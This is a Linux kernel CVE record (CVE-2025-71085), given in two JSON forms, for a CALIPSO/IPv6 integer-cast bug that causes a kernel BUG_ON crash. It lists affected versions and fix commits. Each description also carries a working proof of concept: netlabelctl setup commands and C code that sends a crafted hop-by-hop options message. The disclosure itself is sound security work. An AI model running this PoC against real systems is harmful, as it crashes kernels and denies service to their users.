{"dataType": "CVE_RECORD", "dataVersion": "5.2", "cveMetadata": {"cveId": "CVE-2025-71085", "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "state": "PUBLISHED", "assignerShortName": "Linux", "dateReserved": "2026-01-13T15:30:19.649Z", "datePublished": "2026-01-13T15:34:48.324Z", "dateUpdated": "2026-01-13T15:34:48.324Z"}, "containers": {"cna": {"providerMetadata": {"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "shortName": "Linux", "dateUpdated": "2026-01-13T15:34:48.324Z"}, "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead < 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom > INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) < 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom > skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom > INT_MAX and delta <= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = &dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg->cmsg_len = cmsg_len;\n cmsg->cmsg_level = IPPROTO_IPV6;\n cmsg->cmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, &msg, 0);"}], "affected": [{"product": "Linux", "vendor": "Linux", "defaultStatus": "unaffected", "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "programFiles": ["net/ipv6/calipso.c"], "versions": [{"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3", "lessThan": "2bb759062efa188ea5d07242a43e5aa5464bbae1", "status": "affected", "versionType": "git"}, {"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3", "lessThan": "c53aa6a5086f03f19564096ee084a202a8c738c0", "status": "affected", "versionType": "git"}, {"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3", "lessThan": "bf3709738d8a8cc6fa275773170c5c29511a0b24", "status": "affected", "versionType": "git"}, {"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3", "lessThan": "73744ad5696dce0e0f43872aba8de6a83d6ad570", "status": "affected", "versionType": "git"}, {"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3", "lessThan": "58fc7342b529803d3c221101102fe913df7adb83", "status": "affected", "versionType": "git"}]}, {"product": "Linux", "vendor": "Linux", "defaultStatus": "affected", "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "programFiles": ["net/ipv6/calipso.c"], "versions": [{"version": "4.8", "status": "affected"}, {"version": "0", "lessThan": "4.8", "status": "unaffected", "versionType": "semver"}, {"version": "6.1.160", "lessThanOrEqual": "6.1.*", "status": "unaffected", "versionType": "semver"}, {"version": "6.6.120", "lessThanOrEqual": "6.6.*", "status": "unaffected", "versionType": "semver"}, {"version": "6.12.64", "lessThanOrEqual": "6.12.*", "status": "unaffected", "versionType": "semver"}, {"version": "6.18.4", "lessThanOrEqual": "6.18.*", "status": "unaffected", "versionType": "semver"}, {"version": "6.19-rc4", "lessThanOrEqual": "*", "status": "unaffected", "versionType": "original_commit_for_fix"}]}], "cpeApplicability": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.8", "versionEndExcluding": "6.1.160"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.8", "versionEndExcluding": "6.6.120"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.8", "versionEndExcluding": "6.12.64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.8", "versionEndExcluding": "6.18.4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.8", "versionEndExcluding": "6.19-rc4"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/2bb759062efa188ea5d07242a43e5aa5464bbae1"}, {"url": "https://git.kernel.org/stable/c/c53aa6a5086f03f19564096ee084a202a8c738c0"}, {"url": "https://git.kernel.org/stable/c/bf3709738d8a8cc6fa275773170c5c29511a0b24"}, {"url": "https://git.kernel.org/stable/c/73744ad5696dce0e0f43872aba8de6a83d6ad570"}, {"url": "https://git.kernel.org/stable/c/58fc7342b529803d3c221101102fe913df7adb83"}], "title": "ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()", "x_generator": {"engine": "bippy-1.2.0"}}}}

{}

{"cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead < 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom > INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) < 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom > skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom > INT_MAX and delta <= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = &dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg->cmsg_len = cmsg_len;\n cmsg->cmsg_level = IPPROTO_IPV6;\n cmsg->cmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, &msg, 0);"}], "id": "CVE-2025-71085", "lastModified": "2026-01-13T16:16:08.117", "metrics": {}, "published": "2026-01-13T16:16:08.117", "references": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "url": "https://git.kernel.org/stable/c/2bb759062efa188ea5d07242a43e5aa5464bbae1"}, {"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "url": "https://git.kernel.org/stable/c/58fc7342b529803d3c221101102fe913df7adb83"}, {"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "url": "https://git.kernel.org/stable/c/73744ad5696dce0e0f43872aba8de6a83d6ad570"}, {"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "url": "https://git.kernel.org/stable/c/bf3709738d8a8cc6fa275773170c5c29511a0b24"}, {"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "url": "https://git.kernel.org/stable/c/c53aa6a5086f03f19564096ee084a202a8c738c0"}], "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "vulnStatus": "Received"}

{}

{}